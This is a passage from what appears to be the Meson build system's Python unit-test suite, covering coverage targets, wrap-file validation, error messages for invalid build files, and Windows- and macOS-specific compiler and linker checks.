unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage') self._check_coverage_files() def test_coverage_complex(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '106 generatorcustom') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage') self._check_coverage_files() def test_coverage_html(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-html') self._check_coverage_files(['html']) def test_coverage_text(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-text') self._check_coverage_files(['text']) def test_coverage_xml(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-xml') self._check_coverage_files(['xml']) def test_cross_file_constants(self): with temp_filename() as crossfile1, temp_filename() as crossfile2: with open(crossfile1, 'w') as f: f.write(textwrap.dedent( ''' [constants] compiler = 'gcc' ''')) with open(crossfile2, 'w') as f: f.write(textwrap.dedent( ''' [constants] toolchain = '/toolchain/' common_flags = ['--sysroot=' + toolchain / 'sysroot'] [properties] c_args = common_flags + ['-DSOMETHING'] cpp_args = c_args + ['-DSOMETHING_ELSE'] [binaries] c = toolchain / compiler ''')) values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2]) self.assertEqual(values['binaries']['c'], '/toolchain/gcc') self.assertEqual(values['properties']['c_args'], ['--sysroot=/toolchain/sysroot', '-DSOMETHING']) self.assertEqual(values['properties']['cpp_args'], ['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE']) @unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason') def test_wrap_git(self): with tempfile.TemporaryDirectory() as tmpdir: srcdir = os.path.join(tmpdir, 'src') shutil.copytree(os.path.join(self.unit_test_dir, '82 wrap-git'), srcdir) upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream') upstream_uri = Path(upstream).as_uri() _git_init(upstream) with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f: f.write(textwrap.dedent(''' [wrap-git] url = {} patch_directory = wrap_git_builddef revision = master '''.format(upstream_uri))) self.init(srcdir) self.build() self.run_tests() def test_multi_output_custom_target_no_warning(self): testdir = os.path.join(self.common_test_dir, '229 custom_target source') out = self.init(testdir) self.assertNotRegex(out, 'WARNING:.*Using the first one.') self.build() self.run_tests() @unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None), 'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners') def test_nostdlib(self): testdir = os.path.join(self.unit_test_dir, '79 nostdlib') machinefile = os.path.join(self.builddir, 'machine.txt') with open(machinefile, 'w') as f: f.write(textwrap.dedent(''' [properties] c_stdlib = 'mylibc' ''')) # Test native C stdlib self.meson_native_file = machinefile self.init(testdir) self.build() # Test cross C stdlib self.new_builddir() self.meson_native_file = None self.meson_cross_file = machinefile self.init(testdir) self.build() def test_meson_version_compare(self): testdir = os.path.join(self.unit_test_dir, '83 meson version compare') out = self.init(testdir) self.assertNotRegex(out, r'WARNING') def test_wrap_redirect(self): redirect_wrap = os.path.join(self.builddir, 'redirect.wrap') real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap') os.makedirs(os.path.dirname(real_wrap)) # Invalid redirect, filename must have .wrap extension with open(redirect_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-redirect] filename = foo/subprojects/real.wrapper ''')) with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'): PackageDefinition(redirect_wrap) # Invalid redirect, filename cannot be in parent directory with open(redirect_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-redirect] filename = ../real.wrap ''')) with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'): PackageDefinition(redirect_wrap) # Invalid redirect, filename must be in foo/subprojects/real.wrap with open(redirect_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-redirect] filename = foo/real.wrap ''')) with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'): wrap = PackageDefinition(redirect_wrap) # Correct redirect with open(redirect_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-redirect] filename = foo/subprojects/real.wrap ''')) with open(real_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-git] url = http://invalid ''')) wrap = PackageDefinition(redirect_wrap) self.assertEqual(wrap.get('url'), 'http://invalid') @skip_if_no_cmake def test_nested_cmake_rebuild(self) -> None: # This checks a bug where if a non-meson project is used as a third # level (or deeper) subproject it doesn't cause a rebuild if the build # files for that project are changed testdir = os.path.join(self.unit_test_dir, '86 nested subproject regenerate depends') cmakefile = Path(testdir) / 'subprojects' / 'sub2' / 'CMakeLists.txt' self.init(testdir) self.build() with cmakefile.open('a') as f: os.utime(str(cmakefile)) self.assertReconfiguredBuildIsNoop() class FailureTests(BasePlatformTests): ''' Tests that test failure conditions. Build files here should be dynamically generated and static tests should go into `test cases/failing*`. This is useful because there can be many ways in which a particular function can fail, and creating failing tests for all of them is tedious and slows down testing. ''' dnf = "[Dd]ependency.*not found(:.*)?" nopkg = '[Pp]kg-config.*not found' def setUp(self): super().setUp() self.srcdir = os.path.realpath(tempfile.mkdtemp()) self.mbuild = os.path.join(self.srcdir, 'meson.build') self.moptions = os.path.join(self.srcdir, 'meson_options.txt') def tearDown(self): super().tearDown() windows_proof_rmtree(self.srcdir) def assertMesonRaises(self, contents, match, *, extra_args=None, langs=None, meson_version=None, options=None, override_envvars=None): ''' Assert that running meson configure on the specified @contents raises a error message matching regex @match. ''' if langs is None: langs = [] with open(self.mbuild, 'w') as f: f.write("project('failure test', 'c', 'cpp'") if meson_version: f.write(", meson_version: '{}'".format(meson_version)) f.write(")\n") for lang in langs: f.write("add_languages('{}', required : false)\n".format(lang)) f.write(contents) if options is not None: with open(self.moptions, 'w') as f: f.write(options) o = {'MESON_FORCE_BACKTRACE': '1'} if override_envvars is None: override_envvars = o else: override_envvars.update(o) # Force tracebacks so we can detect them properly with self.assertRaisesRegex(MesonException, match, msg=contents): # Must run in-process or we'll get a generic CalledProcessError self.init(self.srcdir, extra_args=extra_args, inprocess=True, override_envvars = override_envvars) def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None): if langs is None: langs = [] with open(self.mbuild, 'w') as f: f.write("project('output test', 'c', 'cpp'") if meson_version: f.write(", meson_version: '{}'".format(meson_version)) f.write(")\n") for lang in langs: f.write("add_languages('{}', required : false)\n".format(lang)) f.write(contents) # Run in-process for speed and consistency with assertMesonRaises return self.init(self.srcdir, extra_args=extra_args, inprocess=True) def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None): ''' Assert that running meson configure on the specified @contents outputs something that matches regex @match. ''' out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version) self.assertRegex(out, match) def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None): ''' Assert that running meson configure on the specified @contents does not output something that matches regex @match. ''' out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version) self.assertNotRegex(out, match) @skipIfNoPkgconfig def test_dependency(self): if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0: raise unittest.SkipTest('zlib not found with pkg-config') a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"), ("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"), ("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"), ("dependency('zlib', required : 1)", "[Rr]equired.*boolean"), ("dependency('zlib', method : 1)", "[Mm]ethod.*string"), ("dependency('zlibfail')", self.dnf),) for contents, match in a: self.assertMesonRaises(contents, match) def test_apple_frameworks_dependency(self): if not is_osx(): raise unittest.SkipTest('only run on macOS') self.assertMesonRaises("dependency('appleframeworks')", "requires at least one module") def test_extraframework_dependency_method(self): code = "dependency('python', method : 'extraframework')" if not is_osx(): self.assertMesonRaises(code, self.dnf) else: # Python2 framework is always available on macOS self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES') def test_sdl2_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('sdl2-config'): raise unittest.SkipTest('sdl2-config found') self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf) if shutil.which('pkg-config'): self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf) with no_pkgconfig(): # Look for pkg-config, cache it, then # Use cached pkg-config without erroring out, then # Use cached pkg-config to error out code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \ "dependency('foobarrr2', method : 'pkg-config', required : false)\n" \ "dependency('sdl2', method : 'pkg-config')" self.assertMesonRaises(code, self.nopkg) def test_gnustep_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('gnustep-config'): raise unittest.SkipTest('gnustep-config found') self.assertMesonRaises("dependency('gnustep')", "(requires a Objc compiler|{})".format(self.dnf), langs = ['objc']) def test_wx_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'): raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found') self.assertMesonRaises("dependency('wxwidgets')", self.dnf) self.assertMesonOutputs("dependency('wxwidgets', required : false)", "Run-time dependency .*WxWidgets.* found: .*NO.*") def test_wx_dependency(self): if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'): raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found') self.assertMesonRaises("dependency('wxwidgets', modules : 1)", "module argument is not a string") def test_llvm_dependency(self): self.assertMesonRaises("dependency('llvm', modules : 'fail')", "(required.*fail|{})".format(self.dnf)) def test_boost_notfound_dependency(self): # Can be run even if Boost is found or not self.assertMesonRaises("dependency('boost', modules : 1)", "module.*not a string") self.assertMesonRaises("dependency('boost', modules : 'fail')", "(fail.*not found|{})".format(self.dnf)) def test_boost_BOOST_ROOT_dependency(self): # Test BOOST_ROOT; can be run even if Boost is found or not self.assertMesonRaises("dependency('boost')", "(BOOST_ROOT.*absolute|{})".format(self.dnf), override_envvars = {'BOOST_ROOT': 'relative/path'}) def test_dependency_invalid_method(self): code = '''zlib_dep = dependency('zlib', required : false) zlib_dep.get_configtool_variable('foo') ''' self.assertMesonRaises(code, ".* is not a config-tool dependency") code = '''zlib_dep = dependency('zlib', required : false) dep = declare_dependency(dependencies : zlib_dep) dep.get_pkgconfig_variable('foo') ''' self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal") code = '''zlib_dep = dependency('zlib', required : false) dep = declare_dependency(dependencies : zlib_dep) dep.get_configtool_variable('foo') ''' self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal") def test_objc_cpp_detection(self): ''' Test that when we can't detect objc or objcpp, we fail gracefully. ''' env = get_fake_env() try: env.detect_objc_compiler(MachineChoice.HOST) env.detect_objcpp_compiler(MachineChoice.HOST) except EnvironmentException: code = "add_languages('objc')\nadd_languages('objcpp')" self.assertMesonRaises(code, "Unknown compiler") return raise unittest.SkipTest("objc and objcpp found, can't test detection failure") def test_subproject_variables(self): ''' Test that: 1. The correct message is outputted when a not-required dep is not found and the fallback subproject is also not found. 2. A not-required fallback dependency is not found because the subproject failed to parse. 3. A not-found not-required dep with a fallback subproject outputs the correct message when the fallback subproject is found but the variable inside it is not. 4. A fallback dependency is found from the subproject parsed in (3) 5. A wrap file from a subproject is used but fails because it does not contain required keys. ''' tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables') out = self.init(tdir, inprocess=True) self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found") self.assertRegex(out, r'Function does not take positional arguments.') self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*') self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*') self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap') def test_exception_exit_status(self): ''' Test exit status on python exception ''' tdir = os.path.join(self.unit_test_dir, '21 exit status') with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'}) self.assertEqual(cm.exception.returncode, 2) self.wipe() def test_dict_requires_key_value_pairs(self): self.assertMesonRaises("dict = {3, 'foo': 'bar'}", 'Only key:value pairs are valid in dict construction.') self.assertMesonRaises("{'foo': 'bar', 3}", 'Only key:value pairs are valid in dict construction.') def test_dict_forbids_duplicate_keys(self): self.assertMesonRaises("dict = {'a': 41, 'a': 42}", 'Duplicate dictionary key: a.*') def test_dict_forbids_integer_key(self): self.assertMesonRaises("dict = {3: 'foo'}", 'Key must be a string.*') def test_using_too_recent_feature(self): # Here we use a dict, which was introduced in 0.47.0 self.assertMesonOutputs("dict = {}", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.46.0') def test_using_recent_feature(self): # Same as above, except the meson version is now appropriate self.assertMesonDoesNotOutput("dict = {}", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.47') def test_using_too_recent_feature_dependency(self): self.assertMesonOutputs("dependency('pcap', required: false)", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.41.0') def test_vcs_tag_featurenew_build_always_stale(self): 'https://github.com/mesonbuild/meson/issues/3904' vcs_tag = '''version_data = configuration_data() version_data.set('PROJVER', '@VCS_TAG@') vf = configure_file(output : 'version.h.in', configuration: version_data) f = vcs_tag(input : vf, output : 'version.h') ''' msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*' self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43') def test_missing_subproject_not_required_and_required(self): self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" + "sub2 = subproject('not-found-subproject', required: true)", """.*Subproject "subprojects/not-found-subproject" required but not found.*""") def test_get_variable_on_not_found_project(self): self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" + "sub1.get_variable('naaa')", """Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""") def test_version_checked_before_parsing_options(self): ''' https://github.com/mesonbuild/meson/issues/5281 ''' options = "option('some-option', type: 'foo', value: '')" match = 'Meson version is.*but project requires >=2000' self.assertMesonRaises("", match, meson_version='>=2000', options=options) def test_assert_default_message(self): self.assertMesonRaises("k1 = 'a'\n" + "assert({\n" + " k1: 1,\n" + "}['a'] == 2)\n", r"Assert failed: {k1 : 1}\['a'\] == 2") def test_wrap_nofallback(self): self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])", r"Dependency \'notfound\' not found and fallback is disabled", extra_args=['--wrap-mode=nofallback']) def test_message(self): self.assertMesonOutputs("message('Array:', ['a', 'b'])", r"Message:.* Array: \['a', 'b'\]") def test_warning(self): self.assertMesonOutputs("warning('Array:', ['a', 'b'])", r"WARNING:.* Array: \['a', 'b'\]") def test_override_dependency_twice(self): self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" + "meson.override_dependency('foo', declare_dependency())", """Tried to override dependency 'foo' which has already been resolved or overridden""") @unittest.skipIf(is_windows(), 'zlib is not available on Windows') def test_override_resolved_dependency(self): self.assertMesonRaises("dependency('zlib')\n" + "meson.override_dependency('zlib', declare_dependency())", """Tried to override dependency 'zlib' which has already been resolved or overridden""") @unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)") class WindowsTests(BasePlatformTests): ''' Tests that should run on Cygwin, MinGW, and MSVC ''' def setUp(self): super().setUp() self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows') @unittest.skipIf(is_cygwin(), 'Test only applicable to Windows') @mock.patch.dict(os.environ) def test_find_program(self): ''' Test that Windows-specific edge-cases in find_program are functioning correctly. Cannot be an ordinary test because it involves manipulating PATH to point to a directory with Python scripts. ''' testdir = os.path.join(self.platform_test_dir, '8 find program') # Find `cmd` and `cmd.exe` prog1 = ExternalProgram('cmd') self.assertTrue(prog1.found(), msg='cmd not found') prog2 = ExternalProgram('cmd.exe') self.assertTrue(prog2.found(), msg='cmd.exe not found') self.assertPathEqual(prog1.get_path(), prog2.get_path()) # Find cmd.exe with args without searching prog = ExternalProgram('cmd', command=['cmd', '/C']) self.assertTrue(prog.found(), msg='cmd not found with args') self.assertPathEqual(prog.get_command()[0], 'cmd') # Find cmd with an absolute path that's missing the extension cmd_path = prog2.get_path()[:-4] prog = ExternalProgram(cmd_path) self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path)) # Finding a script with no extension inside a directory works prog = ExternalProgram(os.path.join(testdir, 'test-script')) self.assertTrue(prog.found(), msg='test-script not found') # Finding a script with an extension inside a directory works prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py')) self.assertTrue(prog.found(), msg='test-script-ext.py not found') # Finding a script in PATH os.environ['PATH'] += os.pathsep + testdir # If `.PY` is in PATHEXT, scripts can be found as programs if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]: # Finding a script in PATH w/o extension works and adds the interpreter prog = ExternalProgram('test-script-ext') self.assertTrue(prog.found(), msg='test-script-ext not found in PATH') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Finding a script in PATH with extension works and adds the interpreter prog = ExternalProgram('test-script-ext.py') self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Using a script with an extension directly via command= works and adds the interpreter prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help']) self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathEqual(prog.get_command()[2], '--help') self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Using a script without an extension directly via command= works and adds the interpreter prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help']) self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathEqual(prog.get_command()[2], '--help') self.assertPathBasenameEqual(prog.get_path(), 'test-script') # Ensure that WindowsApps gets removed from PATH path = os.environ['PATH'] if 'WindowsApps' not in path: username = os.environ['USERNAME'] appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username) path = os.pathsep + appstore_dir path = ExternalProgram._windows_sanitize_path(path) self.assertNotIn('WindowsApps', path) def test_ignore_libs(self): ''' Test that find_library on libs that are to be ignored returns an empty array of arguments. Must be a unit test because we cannot inspect ExternalLibraryHolder from build files. ''' testdir = os.path.join(self.platform_test_dir, '1 basic') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Not using MSVC') # To force people to update this test, and also test self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'}) for l in cc.ignore_libs: self.assertEqual(cc.find_library(l, env, []), []) def test_rc_depends_files(self): testdir = os.path.join(self.platform_test_dir, '5 resources') # resource compiler depfile generation is not yet implemented for msvc env = get_fake_env(testdir, self.builddir, self.prefix) depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'} self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Test compile_resources(depend_file:) # Changing mtime of sample.ico should rebuild prog self.utime(os.path.join(testdir, 'res', 'sample.ico')) self.assertRebuiltTarget('prog') # Test depfile generation by compile_resources # Changing mtime of resource.h should rebuild myres.rc and then prog if depfile_works: self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h')) self.assertRebuiltTarget('prog') self.wipe() if depfile_works: testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of resource.h should rebuild myres_1.rc and then prog_1 self.utime(os.path.join(testdir, 'res', 'resource.h')) self.assertRebuiltTarget('prog_1') def test_msvc_cpp17(self): testdir = os.path.join(self.unit_test_dir, '45 vscpp17') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') try: self.init(testdir) except subprocess.CalledProcessError: # According to Python docs, output is only stored when # using check_output. We don't use it, so we can't check # that the output is correct (i.e. that it failed due # to the right reason). return self.build() def test_install_pdb_introspection(self): testdir = os.path.join(self.platform_test_dir, '1 basic') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') self.init(testdir) installed = self.introspect('--installed') files = [os.path.basename(path) for path in installed.values()] self.assertTrue('prog.pdb' in files) def _check_ld(self, name: str, lang: str, expected: str) -> None: if not shutil.which(name): raise unittest.SkipTest('Could not find {}.'.format(name)) envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]] # Also test a deprecated variable if there is one. if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP: envvars.append( mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]]) for envvar in envvars: with mock.patch.dict(os.environ, {envvar: name}): env = get_fake_env() try: comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) except EnvironmentException: raise unittest.SkipTest('Could not find a compiler for {}'.format(lang)) self.assertEqual(comp.linker.id, expected) def test_link_environment_variable_lld_link(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('lld-link', 'c', 'lld-link') def test_link_environment_variable_link(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('link', 'c', 'link') def test_link_environment_variable_optlink(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('optlink', 'c', 'optlink') @skip_if_not_language('rust') def test_link_environment_variable_rust(self): self._check_ld('link', 'rust', 'link') @skip_if_not_language('d') def test_link_environment_variable_d(self): env = get_fake_env() comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST) if comp.id == 'dmd': raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.') self._check_ld('lld-link', 'd', 'lld-link') def test_pefile_checksum(self): try: import pefile except ImportError: if is_ci(): raise raise unittest.SkipTest('pefile module not found') testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir, extra_args=['--buildtype=release']) self.build() # Test that binaries have a non-zero checksum env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) cc_id = cc.get_id() ld_id = cc.get_linker_id() dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0] exe = os.path.join(self.builddir, 'cppprog.exe') for f in (dll, exe): pe = pefile.PE(f) msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id) if cc_id == 'clang-cl': # Latest clang-cl tested (7.0) does not write checksums out self.assertFalse(pe.verify_checksum(), msg=msg) else: # Verify that a valid checksum was written by all other compilers self.assertTrue(pe.verify_checksum(), msg=msg) def test_qt5dependency_vscrt(self): ''' Test that qt5 dependencies use the debug module suffix when b_vscrt is set to 'mdd' ''' # Verify that the `b_vscrt` option is available env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if 'b_vscrt' not in cc.base_options: raise unittest.SkipTest('Compiler does not support setting the VS CRT') # Verify that qmake is for Qt5 if not shutil.which('qmake-qt5'): if not shutil.which('qmake') and not is_ci(): raise unittest.SkipTest('QMake not found') output = subprocess.getoutput('qmake --version') if 'Qt version 5' not in output and not is_ci(): raise unittest.SkipTest('Qmake found, but it is not for Qt 5.') # Setup with /MDd testdir = os.path.join(self.framework_test_dir, '4 qt') self.init(testdir, extra_args=['-Db_vscrt=mdd']) # Verify that we're linking to the debug versions of Qt DLLs build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents) self.assertIsNotNone(m, msg=contents) def test_compiler_checks_vscrt(self): ''' Test that the correct VS CRT is used when running compiler checks ''' # Verify that the `b_vscrt` option is available env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if 'b_vscrt' not in cc.base_options: raise unittest.SkipTest('Compiler does not support setting the VS CRT') def sanitycheck_vscrt(vscrt): checks = self.get_meson_log_sanitychecks() self.assertTrue(len(checks) > 0) for check in checks: self.assertIn(vscrt, check) testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) sanitycheck_vscrt('/MDd') self.new_builddir() self.init(testdir, extra_args=['-Dbuildtype=debugoptimized']) sanitycheck_vscrt('/MD') self.new_builddir() self.init(testdir, extra_args=['-Dbuildtype=release']) sanitycheck_vscrt('/MD') self.new_builddir() self.init(testdir, extra_args=['-Db_vscrt=md']) sanitycheck_vscrt('/MD') self.new_builddir() self.init(testdir, extra_args=['-Db_vscrt=mdd']) sanitycheck_vscrt('/MDd') self.new_builddir() self.init(testdir, extra_args=['-Db_vscrt=mt']) sanitycheck_vscrt('/MT') self.new_builddir() self.init(testdir, extra_args=['-Db_vscrt=mtd']) sanitycheck_vscrt('/MTd') @unittest.skipUnless(is_osx(), "requires Darwin") class DarwinTests(BasePlatformTests): ''' Tests that should run on macOS ''' def setUp(self): super().setUp() self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx') def test_apple_bitcode(self): ''' Test that -fembed-bitcode is correctly added while compiling and -bitcode_bundle is added while linking when b_bitcode is true and not when it is false. This can't be an ordinary test case because we need to inspect the compiler database. ''' testdir = os.path.join(self.platform_test_dir, '7 bitcode') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.id != 'clang': raise unittest.SkipTest('Not using Clang on OSX') # Try with bitcode enabled out = self.init(testdir, extra_args='-Db_bitcode=true') # Warning was printed self.assertRegex(out, 'WARNING:.*b_bitcode') # Compiler options were added for compdb in self.get_compdb(): if 'module' in compdb['file']: self.assertNotIn('-fembed-bitcode', compdb['command']) else: self.assertIn('-fembed-bitcode', compdb['command']) build_ninja = os.path.join(self.builddir, 'build.ninja') # Linker options were added with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('LINK_ARGS =.*-bitcode_bundle', contents) self.assertIsNotNone(m, msg=contents) # Try with bitcode disabled self.setconf('-Db_bitcode=false') # Regenerate build self.build() for compdb in self.get_compdb(): self.assertNotIn('-fembed-bitcode', compdb['command']) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('LINK_ARGS 